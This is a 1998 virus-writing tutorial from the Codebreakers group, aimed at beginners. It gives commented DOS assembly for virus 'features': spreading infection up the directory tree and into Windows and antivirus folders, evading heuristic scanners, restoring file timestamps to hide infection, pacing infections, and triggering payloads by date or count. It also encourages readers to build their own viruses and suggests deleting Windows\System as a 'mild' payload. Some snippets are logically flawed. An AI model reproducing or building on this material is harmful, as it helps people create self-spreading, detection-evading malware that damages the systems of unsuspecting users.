Virus "Add-Ons" Tutorial
by Opic [Codebreakers,1998]
Let me first say that this tutorial is directed at the newbie, and not for experienced coders. That being said this tutorial is to aid you in coding the "features" of your virus. Which, when you think about it, is pretty fucking important! (please note that I will not be dealing with encryption or the main virus body as Sea4 and Horny Toad have already covered these)It is one of the only things that makes your virus unique. So throughout this tutorial remember that you should not be cutting and pasting code here, I want you to take the example I give you and expand upon them, make them better or code them in a new way; in other words make it interesting and be creative (why else might you code virii anyways?). The article is divided into two sections: the first will be on techniques that are utilitary in nature (they will add features to how the virus functions), the second will be on payload and payload activation ideas and techniques.
SECTION 1.
CHANGING DIRECTORYS
Ok, the first technique I will show you is the simple DotDot method of changing directories. This allows your runtime infecting virus to infect from its starting directory all the way up to root infecting each directory and its first subdirectory. We plug this into our virus by modifying our find-first routine to jump to our DotDot routine, I'll include the minor change in code so that it is blindingly clear to you what I mean. Here is the the DotDot routine with our slightly modified find first:
find_first:
mov ah,4eh ;find's first file in the starting directory
lea dx,[bp+filespec] ;loads type of file we are looking for in dx
int 21h ;go dos!
jnc open ;found one! go to open and infect routine
;it should be noted that the findnext command
;should be somewhere in end of this routine
jmp DotDot ;otherwise change directory
DotDot: ;this is the dot dot routine
lea dx,[bp+dotdot] ;load dotdot from datasegment
mov ah, 3Bh ;int for "chdir" set current directory
int 21h ;do it!
jnc find_first ;find first file in new directory
jmp exit_stage_left ;we hit root and have now have max file
;infection (well max for this method)
dotdot db '..',0
understand? hopefully you do :) basically instead of exiting after infecting just one dir we change to the next one infect it and its first subdir and so on until we hit root, then exit. Likewise we can use 3Bh to infect (or do anything we like to) a certain directory or subdirectory. I'm sure you can all think of a directory alot of people have and you would like to infect :) Well if you cant then don't worry, I've got your back covered on this one: how 'bout Windows\Command? here's an example of how to change directories to a specific directory:
windoze:
mov ah,3bh ;int to "chdir" set current directory
lea dx,winspec ;load windows location
int 21h ;go dos go!
jnc find_first ;find first file to infect
jmp exit_stage_left ;done with doze? lets bring it on home!
winspec db 'C:\windows\command',0
No big change right? Good! Enough said, you can use the DotDot routine in combination with infecting specific directories which are likely to be present on most systems to get a wider infection rate. Also consider other directories which you may want to "modify" (such as your favorite AV scanner etc.).
SIMPLE ANTI-HEURISTICS LOOP
The next technique I'd like to show you is a simple loop to kill some heuristic scanners. This can be effective when paired with encryption, but doesn't perform well as a single measure against AV scanners.This one should be pretty self explanatory so I wont say much about it other then you should place it at the beginning of your virus ;)
mov cx,0ffffh ;should look familiar from other antiheurist loops AH1: ;anti-Heur1 label jmp AH2 ;jump AH2 mov ax,4c00h ;function 4ch: "exit" terminate with return code int 21h ;go dos! AH2: ;anti-huer2 label loop AH1 ;loop AH1
Not much else I can say about this one except credits go to spo0ky for resurrecting this old technique and giving it a makeover ;)
RESTORING TIME/DATE STAMPS
Want to make your virus a little less noticeable? It looks awfully strange when all the infected files have the same time/date stamp doesnt it? Well its a very simple procedure to save the time/date stamps and restore them after infecting the file. Heres how simple it really is:
Get Time/Date stamps:
This should be done after you open the file but BEFORE you infect or modify the file in any way.
mov ax,5700h ;get files time/date stamp int 21h ;now! push dx ;save the values push cx ;in dx and cx
Restore Time/Date stamps:
This should be done right before you close the file.
mov ax,5701h ;restore files time/date stamp
pop dx ;from
pop cx ;dx and cx
int 21h ;now!
Too much of a good thing can be bad right? Same goes for infecting files, we want to infect as many of them as we can but we may not want to do it all at one time as it may appear suspicious to the user that all his files have suddenly grown by however many bytes your virus is. So lets take our time and infect only so many files per run, the way we do this is via a infection counter. The counter is a pretty versatile thing, we can use it for whatever we want (example: we could also use it as a payload activation; payload activates ever 15 runs or whatever) just use your imagination. At any rate we will use it as a counter in this example which infects 10 files per run.
inc byte ptr [counter] ;add one to our counter
cmp byte ptr [counter],10 ;10 infections?
je Clear ;we hit 10? clear counter and exit!
Clear:
mov byte ptr [counter],0 ;clears infection counter
jmp exit_stage_left ;and get outta here!
counter db 0
The counter portion of the example should be placed at the end of your infection routine, after you close the infected file. The "Clear" routine should lie somewhere outside of the exit code so it is not executed when it shouldn't be.
CHECKING VICTUM FILE SIZE
Heres one of many ways you can check the victims filesize to see if it should be infected. files that are too large should not be infected as they will corrupt due to the change in size your virus makes(an good example is command.com which is not a "real" .com per say and can corrupt if more bytes are added) Files too small should be avoided due to obvious reasons. This code would be placed somewhere after we open the file and get file info. In this example we are checking to see if the file is bigger the 4000 bytes or smaller then 40 (purely random numbers to illustrate the method, I dont recommend you use these particular figures for your standard size check ;)
cmp word ptr 1ah,4000 ;compare size with 4000
jna small ;ok not too big, too small?
jmp find_next ;its too big! find next file
small: ;lets see if its too small now
cmp word ptr 1ah,40 ;compare size with 40
jnb continue ;if bigger then 40 we are ok :)
jmp find_next
continue: ;skip the find_next jump and we
;proceed with infection.....
SECTION 2.
PAYLOADS AND PAYLOAD CRITERIA
This is the portion of your virus in which you should make it as unique and interesting as possible. Not only to hone your creative mentality but also to make your virus noticed After all there are thousands of virii out there and the majority of them dont do ANYTHING interesting! And as a consequence they are thrown into AV programs as Virus.874 (if they even make it into a scanners library) simply because your virus did not have many unique aspects which makes it interesting for the AV researcher to investigate.So make it interesting and challenging and meanwhile you will be making a name for yourself :) And remember that this is the only part of your virus that the viewing audience will actually be able to see and possibly even appreciate (or despise).
As for my opinion on destructive payloads;
I am not in favor of them, so if you want to learn how to format a disk then go look for another tutorial. Destructive payloads have for starters been done to death! Peoples hard drives have been fucked up by virii in just about every way imaginable and its not all that impressive, and its VERY easy to code(it takes 5 lines of code to format a disk)and thus shows little ability on your part. But if you are dead set on making a destructive payload I urge you to make it something which will alter the system without destroying personal data, and one that is easily fixed (such as hindering windows by removing the Windows\System dir which kills windows but can be fixed by replacing the dir from the users Windows CD or whatever). OK, enough about that.
Payload Criteria
There is an infinite number of activation routines. I obviously won't cover them all but will show you a few common ones which you can incorporate and adjust in your virii.
Date activation:
This is a very common way that virii activate. Heres how it breaks down: we check the system date with int 21/2a, our returns we will want to compare with are as follows:
CX=year (1980-2099) DH=month DL=day AL=day of week (00h=sunday)
simple huh? Ill provide a few examples to be sure you understand.
Want to activate your virus only on Mondays?
mov ah,2ah ;gets system date
int 21h ;get it
cmp al,001h ;compares, is it monday?
;if you hadn't already guessed:
;001h=Mon 002h=Tue 003h=Wed, and so on...
je payload ;if so, run the payload
jmp exit_stage_left ;if not then we exit
Want your payload active on the 15th of every month?
mov ah,2ah ;get system date int 21h ;go cmp dl,15 ;is it the 15th? je payload ;yes? lets do it! jmp exit_stage_left ;no? outta here
Ok, but what about seconds and minutes you say? easy enough, Lets say you wanted your payload to go off at 30 minutes when the seconds are less then 40:
mov ah,2Ch ;checks internal clock int 21h ;go cmp cl,30d ;is the time 30 minutes? jne exit_stage_left ;no? outta here cmp dh,40d ;are the seconds less then 40? jb payload ;yes? payload please! jmp exit_stage_left ;no? outta here!
Alright, thats enough about time/date activation. Another common payload activation routine is based upon infection count ie: the payload is activated every certain number of infections. This is quite easily done via another counter (please see CONTROLING RATE OF INFECTION for code).
You can also mix these two method for a more random payload activation, such as after 15 files have been infected checking if the seconds are less then 20 to activate your payload, giving your payload a seemingly random occurence rate. Play with these techniques and explore new ones of your own.
Payloads:
Im obviously not going to show you full payloads to incorporate into your virii but rather I will give you useful ideas and techniques for you to incorporate into your payloads. Remember this is your window of opportunity to do or say anything you want to the people who experience your virus, so I urge you to make it good! please dont write some lame payload that makes virii writers look like children writing with crayons on the wall ;) Be poetic or artistic or political, or anything besides then lame, childish and egotistical. And remember the more impressive and interesting your payloads are, the more your virus will be noticed.
Displaying a message to the screen:
This is a pretty basic thing you should know.
mov ah,9h ;print string to standard output
lea dx,message ;get message from data segment
int 21h ;do it!
message db 'Daytime drives and drives afternoon taxi accident,',10,13,
db 'lunchtime. Rich in flavor, heavy, slow sunshines ',10,13,
db 'iron into iodine.',10,13,
db '',10,13
db 'Suriv, coded and copywrited:Opic,[codebreakers,98]',10,13,'$'
How about printing something out of the printer?
mov ah,01h ;begin of printer payload
mov dx,0h ;put 0h in dx
int 17h ;int for initializing printer
lea si,string1 ;load string1 to si
mov cx,String1Len ;move string1len to cx
PrintStr: ;label fer printing our message
mov ah,00h ;write characters
lodsb ;you know right :)
int 17h ;printer int
loop PrintStr ;loop printstr till we are done
String1Len EQU EndStr1-String1
String1 db 'Vive la difference!',0dh,0ah
db 'Suriv, coded and copywrited:Opic,[codebreakers,98]',0ch
EndStr1:
Graphics:
O.K, let me start by saying that programming graphics in ASM is pretty goddamn difficult in my opinion. And Im NOT going to show you how to do alot with graphics right now (this is a virus tut not a graphics one right?) But I will show you some code to give you an idea of how graphics in ASM work. Heres a bit of code that will create a blue pixel in the center of your screen.
mov ax,13 ;sets mode 13h int 10h ;int 10=video int mov ah,0ch ;fuct 0Ch (look it up, you have the R.browns right?) mov al,17 ;color 17=blue mov cx,160 ;x axis position 160 (center) mov dx,100 ;y axis position 100 (center) int 10h ;thats it
Remember this is just the tip of the iceberg, creating good graphics in ASM shows a tremendous amount of skill and patience, and is sure to dazzle your audience :)
Heres a few other neat little things you could do if you wanted to be a bit more subtle.
Changing the date:
mov ah,2bh ;set system date
mov cx,2001 ;change year to 2001
int 21h ;go!
;Im sure you know how to change it to a specific day by
;yourself, right?
Create a new subdirectory:
I think this one is kind of fun, just create a new subdirectory which you could place on the desktop :)
mov ah,39h ;create new subdir lea dx,dirname ;with the name of... int 21h ;go! dirname db 'Hello_user!',0
This should get you well on your way to writing more sophisticated and interesting virii. Take the time and energy to make interesting code and you will enjoy yourself that much more. Take the time to learn how to write songs and graphics in asm if you are so inclined, they are challenging and will improve your coding abilities. You could consider your virii "living works of art" dont cheat them by writing a great virus with a half-assed payload or visa versa. And above all enjoy whatever it is you create. That's all for now.
- Opic [Codebreakers,98]
email: opic@thepentagon.com